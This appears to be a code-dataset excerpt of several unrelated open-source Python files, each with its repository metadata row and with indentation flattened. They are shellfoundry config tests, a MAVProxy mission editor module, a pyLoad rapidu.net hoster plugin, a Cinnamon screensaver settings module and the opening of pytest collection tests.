open_mock.side_effect = [
IOError("Failed to create the file, maybe it is already exists")
]
# Act
with patch(
"shellfoundry.utilities.config.config_file_creation.os.path.exists"
) as path_mock:
path_mock.side_effect = [False, True, True]
ConfigFileCreation().create(cfg_path)
# Assert
echo_mock.assert_called_once_with("Creating config file...")
@patch("shellfoundry.utilities.config.config_file_creation.click.echo")
def test_failed_to_create_folder_hierarchy(self, echo_mock):
# Arrange
cfg_path = "/quali/shellfoundry/global_config.yml"
# Act
with patch(
"shellfoundry.utilities.config.config_file_creation.os.makedirs"
) as makedirs_mock:
makedirs_mock.side_effect = [
OSError("Failed to create the folders hierarchy")
]
self.assertRaises(OSError, ConfigFileCreation().create, cfg_path)
# Assert
echo_mock.assert_any_call("Failed to create config file")
@patch("shellfoundry.utilities.config.config_file_creation.click.echo")
def test_failed_to_save_new_record(self, echo_mock):
# Arrange
self.fs.create_file(
"/quali/shellfoundry/global_config.yml",
contents="""
install:
host: someaddress""",
)
# Act
with patch("shellfoundry.utilities.config.config_context.yaml") as yaml_mock:
yaml_mock.safe_load.side_effect = [Exception()]
context = ConfigContext("/quali/shellfoundry/global_config.yml")
record = ConfigRecord("key", "value")
record.save(context)
# Assert
echo_mock.assert_called_once_with("Failed to save key value")
file_content = self.fs.get_object(
"/quali/shellfoundry/global_config.yml"
).contents
import os
self.assertTrue(
file_content
== """
install:
host: someaddress""",
"Expected: {}{}Actual: {}".format(
"""
install:
host: someaddress""",
os.linesep,
file_content,
),
)
@patch("shellfoundry.utilities.config.config_file_creation.click.echo")
def test_failed_to_delete_record(self, echo_mock):
# Arrange
self.fs.create_file(
"/quali/shellfoundry/global_config.yml",
contents="""
install:
host: someaddress""",
)
# Act
with patch("shellfoundry.utilities.config.config_context.yaml") as yaml_mock:
yaml_mock.safe_load.side_effect = [Exception()]
context = ConfigContext("/quali/shellfoundry/global_config.yml")
record = ConfigRecord("host")
record.delete(context)
# Assert
echo_mock.assert_called_once_with("Failed to delete key")
file_content = self.fs.get_object(
"/quali/shellfoundry/global_config.yml"
).contents
import os
self.assertTrue(
file_content
== """
install:
host: someaddress""",
"Expected: {}{}Actual: {}".format(
"""
install:
""",
os.linesep,
file_content,
),
)
| QualiSystems/shellfoundry | tests/test_utilities/config/test_config_record.py | Python | apache-2.0 | 5,062 | 0.001185 |
#!/usr/bin/env python
'''
mission editor module
Michael Day
June 2104
'''
from MAVProxy.modules.lib import mp_module
from MAVProxy.modules.lib import mp_util
from MAVProxy.modules.mavproxy_misseditor import me_event
MissionEditorEvent = me_event.MissionEditorEvent
from pymavlink import mavutil
import multiprocessing, time
import threading
import Queue
import traceback
class MissionEditorEventThread(threading.Thread):
def __init__(self, mp_misseditor, q, l):
threading.Thread.__init__(self)
self.mp_misseditor = mp_misseditor
self.event_queue = q
self.event_queue_lock = l
self.time_to_quit = False
def run(self):
while not self.time_to_quit:
queue_access_start_time = time.time()
self.event_queue_lock.acquire()
request_read_after_processing_queue = False
while self.event_queue.qsize() > 0 and (time.time() - queue_access_start_time) < 0.6:
event = self.event_queue.get()
if event.get_type() == me_event.MEE_READ_WPS:
self.mp_misseditor.mpstate.module('wp').cmd_wp(['list'])
#list the rally points while I'm add it:
#TODO: DON'T KNOW WHY THIS DOESN'T WORK
#self.mp_misseditor.mpstate.module('rally').cmd_rally(['list'])
#means I'm doing a read & don't know how many wps to expect:
self.mp_misseditor.num_wps_expected = -1
self.wps_received = {}
elif event.get_type() == me_event.MEE_TIME_TO_QUIT:
self.time_to_quit = True
elif event.get_type() == me_event.MEE_GET_WP_RAD:
wp_radius = self.mp_misseditor.module('param').mav_param.get('WP_RADIUS')
if (wp_radius is None):
continue
self.mp_misseditor.gui_event_queue_lock.acquire()
self.mp_misseditor.gui_event_queue.put(MissionEditorEvent(
me_event.MEGE_SET_WP_RAD,wp_rad=wp_radius))
self.mp_misseditor.gui_event_queue_lock.release()
elif event.get_type() == me_event.MEE_SET_WP_RAD:
self.mp_misseditor.param_set('WP_RADIUS',event.get_arg("rad"))
elif event.get_type() == me_event.MEE_GET_LOIT_RAD:
loiter_radius = self.mp_misseditor.module('param').mav_param.get('WP_LOITER_RAD')
if (loiter_radius is None):
continue
self.mp_misseditor.gui_event_queue_lock.acquire()
self.mp_misseditor.gui_event_queue.put(MissionEditorEvent(
me_event.MEGE_SET_LOIT_RAD,loit_rad=loiter_radius))
self.mp_misseditor.gui_event_queue_lock.release()
elif event.get_type() == me_event.MEE_SET_LOIT_RAD:
loit_rad = event.get_arg("rad")
if (loit_rad is None):
continue
self.mp_misseditor.param_set('WP_LOITER_RAD', loit_rad)
#need to redraw rally points
# Don't understand why this rally refresh isn't lagging...
# likely same reason why "timeout setting WP_LOITER_RAD"
#comes back:
#TODO: fix timeout issue
self.mp_misseditor.mpstate.module('rally').rallyloader.last_change = time.time()
elif event.get_type() == me_event.MEE_GET_WP_DEFAULT_ALT:
self.mp_misseditor.gui_event_queue_lock.acquire()
self.mp_misseditor.gui_event_queue.put(MissionEditorEvent(
me_event.MEGE_SET_WP_DEFAULT_ALT,def_wp_alt=self.mp_misseditor.mpstate.settings.wpalt))
self.mp_misseditor.gui_event_queue_lock.release()
elif event.get_type() == me_event.MEE_SET_WP_DEFAULT_ALT:
self.mp_misseditor.mpstate.settings.command(["wpalt",event.get_arg("alt")])
elif event.get_type() == me_event.MEE_WRITE_WPS:
self.mp_misseditor.module('wp').wploader.clear()
self.mp_misseditor.master.waypoint_count_send(event.get_arg("count"))
self.mp_misseditor.num_wps_expected = event.get_arg("count")
self.mp_misseditor.wps_received = {}
elif event.get_type() == me_event.MEE_WRITE_WP_NUM:
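                    # Build a MISSION_ITEM from the GUI values: seq, frame,
                    # command, current=0, autocontinue=1, params 1-4 and lat/lon/alt.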
w = mavutil.mavlink.MAVLink_mission_item_message(
self.mp_misseditor.target_system,
self.mp_misseditor.target_component,
event.get_arg("num"),
event.get_arg("frame"),
event.get_arg("cmd_id"),
0, 1,
event.get_arg("p1"), event.get_arg("p2"),
event.get_arg("p3"), event.get_arg("p4"),
event.get_arg("lat"), event.get_arg("lon"),
event.get_arg("alt"))
self.mp_misseditor.module('wp').wploader.add(w)
self.mp_misseditor.master.mav.send(
self.mp_misseditor.module('wp').wploader.wp(w.seq))
#tell the wp module to expect some waypoints
self.mp_misseditor.module('wp').loading_waypoints = True
elif event.get_type() == me_event.MEE_LOAD_WP_FILE:
self.mp_misseditor.module('wp').cmd_wp(['load',event.get_arg("path")])
#Wait for the other thread to finish loading waypoints.
#don't let this loop run forever in case we have a lousy
#link to the plane
i = 0
while (i < 10 and
self.mp_misseditor.module('wp').loading_waypoints):
time.sleep(1)
i = i + 1
                    #don't modify queue while in the middle of processing it:
request_read_after_processing_queue = True
elif event.get_type() == me_event.MEE_SAVE_WP_FILE:
self.mp_misseditor.module('wp').cmd_wp(['save',event.get_arg("path")])
self.event_queue_lock.release()
#if event processing operations require a mission referesh in GUI
#(e.g., after a load or a verified-completed write):
if (request_read_after_processing_queue):
self.event_queue_lock.acquire()
self.event_queue.put(MissionEditorEvent(me_event.MEE_READ_WPS))
self.event_queue_lock.release()
#periodically re-request WPs that were never received:
#DON'T NEED TO! -- wp module already doing this
time.sleep(0.2)
class MissionEditorModule(mp_module.MPModule):
'''
A Mission Editor for use with MAVProxy
'''
def __init__(self, mpstate):
super(MissionEditorModule, self).__init__(mpstate, "misseditor", "mission editor", public = True)
self.num_wps_expected = 0 #helps me to know if all my waypoints I'm expecting have arrived
self.wps_received = {}
from ..lib.multiprocessing_queue import makeIPCQueue
self.event_queue = makeIPCQueue()
self.event_queue_lock = multiprocessing.Lock()
self.gui_event_queue = makeIPCQueue()
self.gui_event_queue_lock = multiprocessing.Lock()
self.event_thread = MissionEditorEventThread(self, self.event_queue, self.event_queue_lock)
self.event_thread.start()
self.close_window = multiprocessing.Semaphore()
self.close_window.acquire()
self.child = multiprocessing.Process(target=self.child_task,args=(self.event_queue,self.event_queue_lock,self.gui_event_queue,self.gui_event_queue_lock,self.close_window))
self.child.start()
self.mpstate.miss_editor = self
self.last_unload_check_time = time.time()
self.unload_check_interval = 0.1 # seconds
self.time_to_quit = False
self.mavlink_message_queue = Queue.Queue()
self.mavlink_message_queue_handler = threading.Thread(target=self.mavlink_message_queue_handler)
self.mavlink_message_queue_handler.start()
def mavlink_message_queue_handler(self):
while not self.time_to_quit:
try:
m = self.mavlink_message_queue.get(block=0)
except Queue.Empty:
time.sleep(0.1)
continue
#MAKE SURE YOU RELEASE THIS LOCK BEFORE LEAVING THIS METHOD!!!
#No "return" statement should be put in this method!
self.gui_event_queue_lock.acquire()
try:
self.process_mavlink_packet(m)
except Exception as e:
print("Caught exception (%s)" % str(e))
traceback.print_stack()
self.gui_event_queue_lock.release()
def unload(self):
'''unload module'''
self.mpstate.miss_editor.close()
self.mpstate.miss_editor = None
def idle_task(self):
now = time.time()
if self.last_unload_check_time + self.unload_check_interval < now:
self.last_unload_check_time = now
if not self.child.is_alive():
self.needs_unloading = True
def mavlink_packet(self, m):
if m.get_type() in ['WAYPOINT_COUNT','MISSION_COUNT', 'WAYPOINT', 'MISSION_ITEM']:
self.mavlink_message_queue.put(m)
def process_mavlink_packet(self, m):
'''handle an incoming mavlink packet'''
mtype = m.get_type()
# if you add processing for an mtype here, remember to add it
# to mavlink_packet, above
if mtype in ['WAYPOINT_COUNT','MISSION_COUNT']:
if (self.num_wps_expected == 0):
#I haven't asked for WPs, or these messages are duplicates
#of msgs I've already received.
self.console.error("No waypoint load started (from Editor).")
#I only clear the mission in the Editor if this was a read event
elif (self.num_wps_expected == -1):
self.gui_event_queue.put(MissionEditorEvent(
me_event.MEGE_CLEAR_MISS_TABLE))
self.num_wps_expected = m.count
self.wps_received = {}
if (m.count > 0):
self.gui_event_queue.put(MissionEditorEvent(
me_event.MEGE_ADD_MISS_TABLE_ROWS,num_rows=m.count-1))
#write has been sent by the mission editor:
elif (self.num_wps_expected > 1):
if (m.count != self.num_wps_expected):
self.console.error("Unepxected waypoint count from APM after write (Editor)")
#since this is a write operation from the Editor there
#should be no need to update number of table rows
elif mtype in ['WAYPOINT', 'MISSION_ITEM']:
#still expecting wps?
if (len(self.wps_received) < self.num_wps_expected):
#if we haven't already received this wp, write it to the GUI:
if (m.seq not in self.wps_received.keys()):
self.gui_event_queue.put(MissionEditorEvent(
me_event.MEGE_SET_MISS_ITEM,
num=m.seq,command=m.command,param1=m.param1,
param2=m.param2,param3=m.param3,param4=m.param4,
lat=m.x,lon=m.y,alt=m.z,frame=m.frame))
self.wps_received[m.seq] = True
def child_task(self, q, l, gq, gl, cw_sem):
'''child process - this holds GUI elements'''
mp_util.child_close_fds()
from ..lib import wx_processguard
from ..lib.wx_loader import wx
from MAVProxy.modules.mavproxy_misseditor import missionEditorFrame
self.app = wx.App(False)
self.app.frame = missionEditorFrame.MissionEditorFrame(parent=None,id=wx.ID_ANY)
self.app.frame.set_event_queue(q)
self.app.frame.set_event_queue_lock(l)
self.app.frame.set_gui_event_queue(gq)
self.app.frame.set_gui_event_queue_lock(gl)
self.app.frame.set_close_window_semaphore(cw_sem)
self.app.SetExitOnFrameDelete(True)
self.app.frame.Show()
# start a thread to monitor the "close window" semaphore:
class CloseWindowSemaphoreWatcher(threading.Thread):
def __init__(self, task, sem):
threading.Thread.__init__(self)
self.task = task
self.sem = sem
def run(self):
self.sem.acquire(True)
self.task.app.ExitMainLoop()
watcher_thread = CloseWindowSemaphoreWatcher(self, cw_sem)
watcher_thread.start()
self.app.MainLoop()
# tell the watcher it is OK to quit:
cw_sem.release()
watcher_thread.join()
def close(self):
'''close the Mission Editor window'''
self.time_to_quit = True
self.close_window.release()
if self.child.is_alive():
self.child.join(1)
self.child.terminate()
self.mavlink_message_queue_handler.join()
self.event_queue_lock.acquire()
self.event_queue.put(MissionEditorEvent(me_event.MEE_TIME_TO_QUIT));
self.event_queue_lock.release()
def read_waypoints(self):
self.module('wp').cmd_wp(['list'])
def update_map_click_position(self, new_click_pos):
self.gui_event_queue_lock.acquire()
self.gui_event_queue.put(MissionEditorEvent(
me_event.MEGE_SET_LAST_MAP_CLICK_POS,click_pos=new_click_pos))
self.gui_event_queue_lock.release()
def init(mpstate):
'''initialise module'''
return MissionEditorModule(mpstate)
| njoubert/MAVProxy | MAVProxy/modules/mavproxy_misseditor/__init__.py | Python | gpl-3.0 | 13,978 | 0.00651 |
# -*- coding: utf-8 -*-
import time
import pycurl
from module.plugins.captcha.ReCaptcha import ReCaptcha
from module.plugins.internal.misc import json
from module.plugins.internal.SimpleHoster import SimpleHoster
class RapiduNet(SimpleHoster):
__name__ = "RapiduNet"
__type__ = "hoster"
__version__ = "0.14"
__status__ = "testing"
__pattern__ = r'https?://(?:www\.)?rapidu\.net/(?P<ID>\d{10})'
__config__ = [("activated", "bool", "Activated", True),
("use_premium", "bool", "Use premium account if available", True),
("fallback", "bool",
"Fallback to free download if premium fails", True),
("chk_filesize", "bool", "Check file size", True),
("max_wait", "int", "Reconnect if waiting time is greater than minutes", 10)]
__description__ = """Rapidu.net hoster plugin"""
__license__ = "GPLv3"
__authors__ = [("prOq", None)]
COOKIES = [("rapidu.net", "rapidu_lang", "en")]
INFO_PATTERN = r'<h1 title="(?P<N>.*)">.*</h1>\s*<small>(?P<S>\d+(\.\d+)?)\s(?P<U>\w+)</small>'
OFFLINE_PATTERN = r'<h1>404'
ERROR_PATTERN = r'<div class="error">'
RECAPTCHA_KEY = r'6Ld12ewSAAAAAHoE6WVP_pSfCdJcBQScVweQh8Io'
def setup(self):
self.resume_download = True
self.multiDL = self.premium
def handle_free(self, pyfile):
self.req.http.lastURL = pyfile.url
self.req.http.c.setopt(
pycurl.HTTPHEADER,
["X-Requested-With: XMLHttpRequest"])
jsvars = self.get_json_response("https://rapidu.net/ajax.php",
get={'a': "getLoadTimeToDownload"},
post={'_go': ""})
if str(jsvars['timeToDownload']) == "stop":
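            # Roughly the number of seconds left until local midnight, when
            # the daily transfer limit resets.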
t = (24 * 60 * 60) - (int(time.time()) %
(24 * 60 * 60)) + time.altzone
self.log_info(_("You've reach your daily download transfer"))
            # @NOTE: check t in case of an unsynchronised clock
self.retry(10, 10 if t < 1 else None, _("Try tomorrow again"))
else:
self.wait(int(jsvars['timeToDownload']) - int(time.time()))
self.captcha = ReCaptcha(pyfile)
response, challenge = self.captcha.challenge(self.RECAPTCHA_KEY)
jsvars = self.get_json_response("https://rapidu.net/ajax.php",
get={'a': "getCheckCaptcha"},
post={'_go': "",
'captcha1': challenge,
'captcha2': response,
'fileId': self.info['pattern']['ID']})
if jsvars['message'] == "success":
self.link = jsvars['url']
def get_json_response(self, *args, **kwargs):
res = self.load(*args, **kwargs)
if not res.startswith('{'):
self.retry()
self.log_debug(res)
return json.loads(res)
| rlindner81/pyload | module/plugins/hoster/RapiduNet.py | Python | gpl-3.0 | 3,047 | 0.001313 |
#!/usr/bin/env python2
from SettingsWidgets import *
from gi.repository import Gtk, Gdk, GLib, Pango
import os, json, subprocess, re
from xml.etree import ElementTree
import gettext
LOCK_DELAY_OPTIONS = [
(0, _("Immediately")),
(15, _("After 15 seconds")),
(30, _("After 30 seconds")),
(60, _("After 1 minute")),
(120, _("After 2 minutes")),
(180, _("After 3 minutes")),
(300, _("After 5 minutes")),
(600, _("After 10 minutes")),
(1800, _("After 30 minutes")),
(3600, _("After 1 hour"))
]
LOCK_INACTIVE_OPTIONS = [
(0, _("Never")),
(60, _("After 1 minute")),
(300, _("After 5 minutes")),
(600, _("After 10 minutes")),
(900, _("After 15 minutes")),
(1800, _("After 30 minutes")),
(2700, _("After 45 minutes")),
(3600, _("After 1 hour"))
]
XSCREENSAVER_PATH = "/usr/share/xscreensaver/config/"
def list_header_func(row, before, user_data):
if before and not row.get_header():
row.set_header(Gtk.Separator(orientation=Gtk.Orientation.HORIZONTAL))
class Module:
name = "screensaver"
category = "prefs"
comment = _("Manage screen lock settings")
def __init__(self, content_box):
keywords = _("screensaver, lock, password, away, message")
sidePage = SidePage(_("Screensaver"), "cs-screensaver", keywords, content_box, module=self)
self.sidePage = sidePage
def on_module_selected(self):
if self.loaded:
return
print "Loading Screensaver module"
schema = "org.cinnamon.desktop.screensaver"
self.settings = Gio.Settings.new(schema)
self.sidePage.stack = SettingsStack()
self.sidePage.add_widget(self.sidePage.stack)
# Screensaver
page = SettingsPage()
page.expand = True
self.sidePage.stack.add_titled(page, "screensaver", _("Screensaver"))
settings = ScreensaverBox(_("Select screensaver"))
page.pack_start(settings, True, True, 0)
# Settings
page = SettingsPage()
self.sidePage.stack.add_titled(page, "settings", _("Settings"))
settings = page.add_section(_("Lock settings"))
size_group = Gtk.SizeGroup.new(Gtk.SizeGroupMode.HORIZONTAL)
widget = GSettingsSwitch(_("Lock the computer when put to sleep"), "org.cinnamon.settings-daemon.plugins.power", "lock-on-suspend")
widget.set_tooltip_text(_("Enable this option to require a password when the computer wakes up from suspend"))
settings.add_row(widget)
widget = GSettingsSwitch(_("Lock the computer when the screen turns off"), schema, "lock-enabled")
widget.set_tooltip_text(_("Enable this option to require a password when the screen turns itself off, or when the screensaver activates after a period of inactivity"))
settings.add_row(widget)
widget = GSettingsComboBox(_("Delay before locking the screen"), schema, "lock-delay", LOCK_DELAY_OPTIONS, valtype="uint", size_group=size_group)
widget.set_tooltip_text(_("This option defines the amount of time to wait before locking the screen, after showing the screensaver or after turning off the screen"))
settings.add_reveal_row(widget, schema, "lock-enabled")
widget = GSettingsComboBox(_("Lock the computer when inactive"), "org.cinnamon.desktop.session", "idle-delay", LOCK_INACTIVE_OPTIONS, valtype="uint", size_group=size_group)
widget.set_tooltip_text(_("This option defines the amount of time to wait before locking the screen, when the computer is not being used"))
settings.add_row(widget)
settings = page.add_section(_("Away message"))
widget = GSettingsEntry(_("Show this message when the screen is locked"), schema, "default-message")
widget.set_child_packing(widget.content_widget, True, True, 0, Gtk.PackType.START)
widget.set_tooltip_text(_("This is the default message displayed on your lock screen"))
settings.add_row(widget)
settings.add_row(GSettingsFontButton(_("Font"), "org.cinnamon.desktop.screensaver", "font-message"))
widget = GSettingsSwitch(_("Ask for a custom message when locking the screen from the menu"), schema, "ask-for-away-message")
widget.set_tooltip_text(_("This option allows you to type a message each time you lock the screen from the menu"))
settings.add_row(widget)
# Date
page = SettingsPage()
self.sidePage.stack.add_titled(page, "date", _("Date"))
settings = page.add_section(_("Date and Time"))
size_group = Gtk.SizeGroup.new(Gtk.SizeGroupMode.HORIZONTAL)
widget = GSettingsSwitch(_("Use a custom date and time format"), schema, "use-custom-format")
settings.add_row(widget)
widget = GSettingsEntry(_("Time Format"), schema, "time-format", size_group=size_group)
settings.add_reveal_row(widget, schema, "use-custom-format")
widget = GSettingsEntry(_("Date Format: "), schema, "date-format", size_group=size_group)
settings.add_reveal_row(widget, schema, "use-custom-format")
widget = GSettingsFontButton(_("Time Font"), "org.cinnamon.desktop.screensaver", "font-time", size_group=size_group)
settings.add_row(widget)
widget = GSettingsFontButton(_("Date Font"), "org.cinnamon.desktop.screensaver", "font-date", size_group=size_group)
settings.add_row(widget)
class ScreensaverBox(Gtk.Box):
def __init__(self, title):
Gtk.Box.__init__(self)
self.set_orientation(Gtk.Orientation.VERTICAL)
frame = Gtk.Frame()
frame.set_shadow_type(Gtk.ShadowType.IN)
frame_style = frame.get_style_context()
frame_style.add_class("view")
self.pack_start(frame, True, True, 0)
schema = "org.cinnamon.desktop.screensaver"
self.settings = Gio.Settings.new(schema)
self.webkit_executable = None
self.xscreensaver_executable = None
self.proc = None
self.current_name = self.settings.get_string("screensaver-name")
if self.current_name == "webkit@cinnamon.org":
self.current_name = self.settings.get_string("screensaver-webkit-theme")
elif self.current_name == "xscreensaver@cinnamon.org":
self.current_name = "xscreensaver-" + self.settings.get_string("xscreensaver-hack")
self.main_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
frame.add(self.main_box)
toolbar = Gtk.Toolbar.new()
Gtk.StyleContext.add_class(Gtk.Widget.get_style_context(toolbar), "cs-header")
label = Gtk.Label()
label.set_markup("<b>%s</b>" % title)
title_holder = Gtk.ToolItem()
title_holder.add(label)
toolbar.add(title_holder)
self.main_box.add(toolbar)
toolbar_separator = Gtk.Separator(orientation=Gtk.Orientation.HORIZONTAL)
self.main_box.add(toolbar_separator)
separator_context = toolbar_separator.get_style_context()
frame_color = frame_style.get_border_color(Gtk.StateFlags.NORMAL).to_string()
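        # Recolour the separator so it matches the frame border and blends
        # with the themed frame.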
css_provider = Gtk.CssProvider()
css_provider.load_from_data(".separator { -GtkWidget-wide-separators: 0; \
color: %s; \
}" % frame_color)
separator_context.add_provider(css_provider, Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION)
self.socket_box = Gtk.Box()
self.socket_box.set_border_width(30)
self.socket_box.set_size_request(-1, 300)
self.socket_box.override_background_color(Gtk.StateFlags.NORMAL, Gdk.RGBA(0, 0, 0, 1))
self.main_box.pack_start(self.socket_box, False, False, 0)
self.main_box.add(Gtk.Separator(orientation=Gtk.Orientation.HORIZONTAL))
scw = Gtk.ScrolledWindow()
scw.expand = True
scw.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.AUTOMATIC)
scw.set_shadow_type(Gtk.ShadowType.NONE)
self.main_box.pack_start(scw, True, True, 0)
self.list_box = Gtk.ListBox()
self.list_box.set_selection_mode(Gtk.SelectionMode.SINGLE)
self.list_box.set_header_func(list_header_func, None)
self.list_box.connect("row-activated", self.on_row_activated)
scw.add(self.list_box)
self.gather_screensavers()
self.socket_box.connect("map", self.on_mapped)
def gather_screensavers(self):
row = ScreensaverRow("", _("Screen Locker"), _("The standard cinnamon lock screen"), "", "default")
self.add_row(row)
if self.current_name == "":
self.list_box.select_row(row)
dirs = [os.path.expanduser("~/.local/share/cinnamon-screensaver/screensavers")] + \
[os.path.join(x, "cinnamon-screensaver/screensavers/") for x in GLib.get_system_data_dirs()]
things = []
for directory in dirs:
if not os.path.isdir(directory):
continue
things += [os.path.join(directory, x) for x in os.listdir(directory)]
for path in things:
if not os.path.isdir(path):
continue
# Recurse inside if it is webkit
if os.path.basename(path.rstrip('/')) == "webkit@cinnamon.org":
webkits = [os.path.join(path, x) for x in os.listdir(path)]
for theme in webkits:
if os.path.basename(theme) == 'main':
self.webkit_executable = theme
continue
if not os.path.isdir(theme):
continue
self.parse_dir(theme, path, "webkit")
continue
if os.path.basename(path.rstrip('/')) == "xscreensaver@cinnamon.org":
if os.path.exists(os.path.join(path, 'main')):
self.xscreensaver_executable = os.path.join(path, 'main')
continue
self.parse_dir(path, path, "standalone")
if self.xscreensaver_executable is not None and os.path.exists(XSCREENSAVER_PATH):
xscreensavers = []
try:
gettext.install("xscreensaver", "/usr/share/locale")
for item in sorted(os.listdir(XSCREENSAVER_PATH)):
if not item.endswith(".xml"):
continue
path = os.path.join(XSCREENSAVER_PATH, item)
try:
                        tree = ElementTree.parse(path)
root = tree.getroot()
name = root.attrib["name"]
label = root.attrib["_label"]
description = root.find("_description").text.strip()
label = _(label)
description = _(description)
row = ScreensaverRow(name, label, description, XSCREENSAVER_PATH, "xscreensaver")
xscreensavers.append(row)
                    except Exception as detail:
                        print("Unable to parse xscreensaver information at %s: %s" % (path, detail))
xscreensavers = sorted(xscreensavers, key=lambda x: x.name)
for xscreensaver in xscreensavers:
self.add_row(xscreensaver)
if self.current_name == "xscreensaver-" + xscreensaver.uuid:
self.list_box.select_row(xscreensaver)
gettext.install("cinnamon", "/usr/share/locale")
            except Exception as detail:
                print("Unable to parse xscreensaver hacks: %s" % detail)
def parse_dir(self, path, directory, ss_type):
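        # Read the plugin's metadata.json and add a row for it, selecting the
        # row if it is the currently configured screensaver.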
try:
metadata = open(os.path.join(path, "metadata.json"), 'r').read()
data = json.loads(metadata)
name = data["name"]
uuid = data["uuid"]
assert uuid == os.path.basename(path.rstrip('/'))
try:
description = data["description"]
except KeyError:
description = None
except ValueError:
description = None
row = ScreensaverRow(uuid, name, description, directory, ss_type)
self.add_row(row)
if self.current_name == uuid:
self.list_box.select_row(row)
except:
            print("Unable to parse screensaver information at %s" % path)
def on_row_activated(self, list_box, row):
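        # Store the selection in gsettings, then launch the matching preview
        # helper and embed the window it reports into the preview area.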
row = self.list_box.get_selected_row()
if not row:
return
uuid = row.uuid
path = row.path
ss_type = row.ss_type
if uuid == '':
self.settings.set_string('screensaver-name', '')
elif ss_type == 'webkit':
self.settings.set_string('screensaver-name', 'webkit@cinnamon.org')
self.settings.set_string('screensaver-webkit-theme', uuid)
elif ss_type == 'xscreensaver':
self.settings.set_string('screensaver-name', 'xscreensaver@cinnamon.org')
self.settings.set_string('xscreensaver-hack', uuid)
else:
self.settings.set_string('screensaver-name', uuid)
if ss_type == 'default':
self.socket_box.foreach(lambda x, y: x.destroy(), None)
px = GdkPixbuf.Pixbuf.new_from_file_at_size("/usr/share/cinnamon/thumbnails/wallclock.png", -1, 240)
w = Gtk.Image.new_from_pixbuf(px)
w.show()
self.socket_box.pack_start(w, True, True, 0)
if ss_type == 'webkit':
command = [self.webkit_executable, "--plugin", uuid]
elif ss_type == 'xscreensaver':
command = [self.xscreensaver_executable, "--hack", uuid]
else:
command = os.path.join(path, "main")
try:
self.proc = subprocess.Popen(command, stdout=subprocess.PIPE)
except:
return
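        # The helper prints "WINDOW ID=<xid>" on stdout; plug that X window
        # into a Gtk.Socket so the preview renders inside the settings page.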
line = self.proc.stdout.readline()
while line:
            match = re.match(r'^\s*WINDOW ID=(\d+)\s*$', line.decode())
if match:
self.socket_box.foreach(lambda x, y: x.destroy(), None)
socket = Gtk.Socket()
socket.show()
self.socket_box.pack_start(socket, True, True, 0)
socket.add_id(int(match.group(1)))
break
line = self.proc.stdout.readline()
def on_mapped(self, widget):
self.on_row_activated(None, None)
GObject.idle_add(self.idle_scroll_to_selection)
def idle_scroll_to_selection(self):
row = self.list_box.get_selected_row()
alloc = row.get_allocation()
adjustment = self.list_box.get_adjustment()
adjustment.set_value(alloc.y)
def add_row(self, row):
self.list_box.add(row)
class ScreensaverRow(Gtk.ListBoxRow):
def __init__(self, uuid, name, description, path, ss_type):
Gtk.ListBoxRow.__init__(self)
self.uuid = uuid
self.name = name
# Add ... to the description if it is cut in the middle of a line. If
# the next line is empty, we interpret this as a paragraph break and
# don't insert ...
desc = description.split('\n')
if len(desc) <= 1 or len(desc[1].strip()) == 0:
self.short_description = desc[0]
else:
self.short_description = desc[0] + "..."
self.description = description
self.path = path
self.ss_type = ss_type
self.set_tooltip_text(self.description)
widget = SettingsWidget()
grid = Gtk.Grid()
grid.set_column_spacing(15)
widget.pack_start(grid, True, True, 0)
self.desc_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
self.desc_box.props.hexpand = True
self.desc_box.props.halign = Gtk.Align.START
self.name_label = Gtk.Label()
self.name_label.set_markup("<b>%s</b>" % self.name)
self.name_label.props.xalign = 0.0
self.desc_box.add(self.name_label)
self.comment_label = Gtk.Label()
self.comment_label.set_markup("<small>%s</small>" % self.short_description)
self.comment_label.props.xalign = 0.0
self.comment_label.set_ellipsize(Pango.EllipsizeMode.END)
self.comment_label.set_max_width_chars(80)
self.desc_box.add(self.comment_label)
grid.attach(self.desc_box, 0, 0, 1, 1)
type_box = Gtk.Box()
type_label = Gtk.Label()
type_label.set_markup("<small><i>%s</i></small>" % self.ss_type)
type_box.pack_start(type_label, True, True, 0)
grid.attach_next_to(type_box, self.desc_box, Gtk.PositionType.RIGHT, 1, 1)
self.add(widget)
| mattthur/Cinnamon | files/usr/lib/cinnamon-settings/modules/cs_screensaver.py | Python | gpl-2.0 | 16,729 | 0.003288 |
import pytest, py
from _pytest.main import Session, EXIT_NOTESTSCOLLECTED
class TestCollector:
def test_collect_versus_item(self):
from pytest import Collector, Item
assert not issubclass(Collector, Item)
assert not issubclass(Item, Collector)
def test_compat_attributes(self, testdir, recwarn):
modcol = testdir.getmodulecol("""
def test_pass(): pass
def test_fail(): assert 0
""")
recwarn.clear()
assert modcol.Module == pytest.Module
assert modcol.Class == pytest.Class
assert modcol.Item == pytest.Item
assert modcol.File == pytest.File
assert modcol.Function == pytest.Function
def test_check_equality(self, testdir):
modcol = testdir.getmodulecol("""
def test_pass(): pass
def test_fail(): assert 0
""")
fn1 = testdir.collect_by_name(modcol, "test_pass")
assert isinstance(fn1, pytest.Function)
fn2 = testdir.collect_by_name(modcol, "test_pass")
assert isinstance(fn2, pytest.Function)
assert fn1 == fn2
assert fn1 != modcol
if py.std.sys.version_info < (3, 0):
assert cmp(fn1, fn2) == 0
assert hash(fn1) == hash(fn2)
fn3 = testdir.collect_by_name(modcol, "test_fail")
assert isinstance(fn3, pytest.Function)
assert not (fn1 == fn3)
assert fn1 != fn3
for fn in fn1,fn2,fn3:
assert fn != 3
assert fn != modcol
assert fn != [1,2,3]
assert [1,2,3] != fn
assert modcol != fn
def test_getparent(self, testdir):
modcol = testdir.getmodulecol("""
class TestClass:
def test_foo():
pass
""")
cls = testdir.collect_by_name(modcol, "TestClass")
fn = testdir.collect_by_name(
testdir.collect_by_name(cls, "()"), "test_foo")
parent = fn.getparent(pytest.Module)
assert parent is modcol
parent = fn.getparent(pytest.Function)
assert parent is fn
parent = fn.getparent(pytest.Class)
assert parent is cls
def test_getcustomfile_roundtrip(self, testdir):
hello = testdir.makefile(".xxx", hello="world")
testdir.makepyfile(conftest="""
import pytest
class CustomFile(pytest.File):
pass
def pytest_collect_file(path, parent):
if path.ext == ".xxx":
return CustomFile(path, parent=parent)
""")
node = testdir.getpathnode(hello)
assert isinstance(node, pytest.File)
assert node.name == "hello.xxx"
nodes = node.session.perform_collect([node.nodeid], genitems=False)
assert len(nodes) == 1
assert isinstance(nodes[0], pytest.File)
class TestCollectFS:
def test_ignored_certain_directories(self, testdir):
tmpdir = testdir.tmpdir
